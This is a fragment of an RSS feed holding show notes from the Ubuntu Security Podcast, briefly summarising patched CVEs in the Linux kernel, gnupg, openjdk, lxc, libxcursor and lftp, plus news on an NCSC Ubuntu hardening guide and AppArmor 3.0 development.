<h3 id="linux-kernel--lsn-0041-1">linux kernel (<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2018-August/004529.html">LSN-0041-1</a>)</h3>
<ul>
<li>brief description of livepatch</li>
<li>Several issues (5 CVEs)
<ul>
<li>stack overflow in SCSI / cdrom layers (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-11506">CVE-2018-11506</a>)</li>
<li>DoS / crash via specially crafted ext4 filesystem (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-1094">CVE-2018-1094</a>)</li>
<li>files can be created with group permissions which the original owner did not have within sgid directories (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-13405">CVE-2018-13405</a>)
<ul>
<li>Originally reported by Jann Horn in relation to whoopsie / apport in Ubuntu</li>
</ul>
</li>
<li>DoS / crash via specially crafted xfs filesystem (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-13094">CVE-2018-13094</a>)</li>
<li>SegmentSmack fix (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-5390">CVE-2018-5390</a>)</li>
</ul>
</li>
<li>generic &amp; lowlatency kernels for Trusty, Xenial and Bionic</li>
</ul>
<h3 id="gnupg--cve-2017-7526----usn-3733-1">gnupg (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2017-7526">CVE-2017-7526</a>) (<a href="https://usn.ubuntu.com/3733-1/">USN-3733-1</a>)</h3>
<ul>
<li>Cache side-channel attack on RSA implementation</li>
<li>When CVE was created, only assigned to libgcrypt</li>
<li>gnupg quietly announced 1.4.23 as fixing this CVE as well in June
<ul>
<li>Turns out was actually fixed in 1.4.22</li>
<li>So Bionic etc not affected</li>
</ul>
</li>
<li>Fixed in Trusty and Xenial</li>
<li>No known exploits in the wild</li>
</ul>
<h3 id="openjdk--cve-2018-2952----usn-3734-1">openjdk (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-2952">CVE-2018-2952</a>) (<a href="https://usn.ubuntu.com/3734-1/">USN-3734-1</a>)</h3>
<ul>
<li>Denial of service via excessive memory consumption</li>
<li>openjdk-7 in trusty and openjdk-8 in xenial</li>
</ul>
<h3 id="lxc--cve-2018-6556----usn-3730-1">lxc (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-6556">CVE-2018-6556</a>) (<a href="https://usn.ubuntu.com/3730-1/">USN-3730-1</a>)</h3>
<ul>
<li>Allows opening (but not reading) of arbitrary files
<ul>
<li>Information disclosure / DoS since could open pseudoterminals or other kernel devices and cause exhausting of resources</li>
</ul>
</li>
<li>For lxc &gt;=2.0 - bionic, xenial-backports</li>
</ul>
<h3 id="libxcursor--cve-2015-9262----usn-3729-1">libxcursor (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2015-9262">CVE-2015-9262</a>) (<a href="https://usn.ubuntu.com/3729-1/">USN-3729-1</a>)</h3>
<ul>
<li>Classic off-by-one error - string allocation but forgot to allocate byte for NUL terminator
<ul>
<li>As on the heap allows heap memory corruption</li>
<li>Possible code execution etc</li>
<li>In handling of cursor themes so could be triggered when loading a malicious themes</li>
</ul>
</li>
<li>Affects libxcursor in trusty and xenial - both fixed</li>
</ul>
<h3 id="lftp--cve-2018-10196----usn-3731-1">lftp (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-10196">CVE-2018-10196</a>) (<a href="https://usn.ubuntu.com/3731-1/">USN-3731-1</a>)</h3>
<ul>
<li>Command-line FTP / HTTP / BitTorrent clients</li>
<li>Does not properly validate filenames from server when mirroring locally
<ul>
<li>Could allow a malicious server to remove all files in PWD</li>
</ul>
</li>
<li>Fixed in Bionic, Xenial, Trusty &amp; <strong>Precise ESM</strong></li>
</ul>
<h3 id="subscribe-to-ubuntu-security-announce-mailing-list">Subscribe to ubuntu-security-announce mailing list</h3>
<ul>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce">https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce</a></li>
</ul>
<h2 id="goings-on-in-ubuntu-security">Goings on in Ubuntu Security</h2>
<h3 id="ncsc-publish-ubuntu-18-dot-04-lts-security-guide">NCSC publish Ubuntu 18.04 LTS Security Guide</h3>
<ul>
<li>A couple weeks old now, but worth mentioning</li>
<li>National Cyber Security Centre in UK
<ul>
<li>Provide infosec guidance to public and private sector</li>
</ul>
</li>
<li>Focuses around End User Devices deployed for remote work but applies equally to home / office as well</li>
<li>Covers guidance such as:
<ul>
<li>VPN</li>
<li>Enforcing a given password policy</li>
<li>UEFI Secure Boot</li>
<li>Livepatch</li>
<li>Firewall configuration</li>
<li>Auditing</li>
</ul>
</li>
<li><a href="https://www.ncsc.gov.uk/guidance/eud-security-guidance-ubuntu-1804-lts">https://www.ncsc.gov.uk/guidance/eud-security-guidance-ubuntu-1804-lts</a></li>
<li><a href="https://blog.ubuntu.com/2018/07/30/national-cyber-security-centre-publish-ubuntu-18-04-lts-security-guide">https://blog.ubuntu.com/2018/07/30/national-cyber-security-centre-publish-ubuntu-18-04-lts-security-guide</a></li>
</ul>
<h3 id="seth-arnold-s-apparmor-3-dot-0-presentation-at-debconf">Seth Arnold&rsquo;s AppArmor 3.0 presentation at DebConf</h3>
<ul>
<li>Overview of AppArmor with brief history and walkthough of main features</li>
<li>Efforts to enable AppArmor by default in Debian Buster (10)</li>
<li>Ongoing work to upstream the latest AppArmor changes
<ul>
<li>Course-grained network mediation (AF_INET / AF_IET6)</li>
<li>DBus mediation
<ul>
<li>Almost all are now in Linux kernel 4.19</li>
</ul>
</li>
<li>Some remain for 4.20
<ul>
<li>Unix sockets</li>
</ul>
</li>
</ul>
</li>
<li>Future directions for AppArmor
<ul>
<li>IMA-aware policy (in 4.17, requires AppArmor 3.0 userspace)
<ul>
<li>Contributed by Google, hopefully will be available soon</li>
</ul>
</li>
<li>Fine-grained networking mediation (ie. port level mediation)</li>
<li>Shared memory mediation</li>
<li>cgroups</li>
<li>overlayfs</li>
<li>user specific policy</li>
</ul>
</li>
<li>Multiple namespaces support for AppArmor
<ul>
<li>LXD / libvirt / snapd / docker</li>
<li>policy within a namespace (and policy outside the namespace too)</li>
</ul>
</li>
<li>Demo of LXD with namespaced policy</li>
<li><a href="https://debconf18.debconf.org/talks/106-apparmor-30/">https://debconf18.debconf.org/talks/106-apparmor-30/</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E000.mp3" length="12202029" type="audio/mpeg" /><itunes:duration>12:42</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item></channel>
</rss>
